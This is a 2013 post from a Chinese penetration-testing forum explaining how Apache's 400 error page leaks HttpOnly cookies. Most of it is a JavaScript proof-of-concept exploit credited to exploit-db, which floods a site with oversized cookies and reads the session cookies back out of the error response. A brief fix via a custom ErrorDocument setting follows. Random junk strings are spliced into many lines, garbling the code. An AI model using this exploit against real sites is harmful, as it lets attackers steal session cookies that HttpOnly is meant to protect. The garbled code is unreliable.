中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]

---

作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题，一般都采用给cookie加上httponly的属性，来禁止直接使用js得到用户的cookie，从而降低xss的危害，而这个问题刚好可以用来绕过cookie的这个httponly的属性。
# Q; l3 T0 ?; V. N# B7 {
7 J% c2 p9 Z2 i* s用chrome打开一个站点，F12打开开发者工具，找到console输入如下代码并回车:

1 x; H9 x! \8 |$ B# t% c, P
// http://www.exploit-db.com/exploits/18442/
2 s4 t3 Z4 @1 a  U2 p0 pfunction setCookies (good) {
// Construct string for cookie value
var str = "";
for (var i=0; i< 819; i++) {
str += "x";
}
// Set cookies
$ \# d& Y6 S2 Y0 w! N/ Tfor (i = 0; i < 10; i++) {
7 X0 j: E1 B9 R" S0 e// Expire evil cookie
if (good) {
3 U) M+ m  l) g+ f1 Yvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
4 k. ?8 @) \/ ~& H  p. c( z- x}
% _4 K; H" R2 I0 y// Set evil cookie
2 k1 M- _  I' I8 Eelse {
+ s5 J3 C) k* U1 _9 q' s1 j! ~3 I3 Z% x1 tvar cookie = "xss"+i+"="+str+";path=/";
}
document.cookie = cookie;
}
}
( Y7 D" u& T6 j8 `( ifunction makeRequest() {
setCookies();
5 x' d3 {3 b+ b5 efunction parseCookies () {
* m6 C3 x- z3 f5 B6 }  G0 @var cookie_dict = {};
( E* e. G( q' r4 E; T3 L// Only react on 400 status
- _( [! X8 ]  I" u; h7 a. eif (xhr.readyState === 4 && xhr.status === 400) {
// Replace newlines and match <pre> content
$ ~9 g- r6 a4 ~+ \5 _2 w* m8 w/ nvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
7 \8 A4 L) V; O* n6 s3 xif (content.length) {
8 y7 w# M; J0 X  D9 W7 Z6 _// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
; R; u4 ]- \: E5 k0 evar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
  d5 ]! n  v7 o7 \// Add cookies to object
- A, |% Z. h$ h: qfor (var i=0; i<cookies.length; i++) {
  d  v3 i8 E: t+ c* E5 H* r+ a) G+ [var s_c = cookies.split('=',2);
# h/ n* ^/ P5 scookie_dict[s_c[0]] = s_c[1];
}
}
// Unset malicious cookies
' z; O6 a& z; {6 w+ ^  @. isetCookies(true);
alert(JSON.stringify(cookie_dict));
8 c3 C+ h7 c9 y6 @6 a& e}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
. [+ E! f2 ]7 s$ u' h% o, Hxhr.open("GET", "/", true);
xhr.send(null);
) H; E; S5 e3 I. [) W5 [9 G; s1 v}
% [5 m1 H% z% tmakeRequest();

1 Y' K$ G; m9 E0 j- @$ t你就能看见华丽丽的400错误包含着cookie信息。
9 G7 K! d2 T: R
下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

修复方案：
7 [$ x" d) `9 r2 u! T% A
Apache官方提供4种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下
3 w& N/ B7 Z6 j/ |- V6 `
* Y2 P3 I2 F# K& I9 dIn the event of a problem or error, Apachecan be configured to do one of four things,

1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
- F) S* ?- z9 K6 @2. output acustomized message输出一段信息
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
4. redirect to an external URL to handle theproblem/error转向一个外部URL
" k2 `% A  w- u: N- U
) W* ~. j$ [' M- k! _经测试，对于400错误只有方法2有效，返回包不会再包含cookie内容

Apache配置：
3 z3 v3 i+ v( N! U
ErrorDocument400 " security test"

当然，升级apache到最新也可：）。
* G8 x# Q) c# p& V
8 A) y3 D' O" P% s! f7 G6 j参考：http://httpd.apache.org/security/vulnerabilities_22.html
- b/ x8 s, C% C+ E; G) h
; o0 a" e1 L8 p4 t! p. a

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2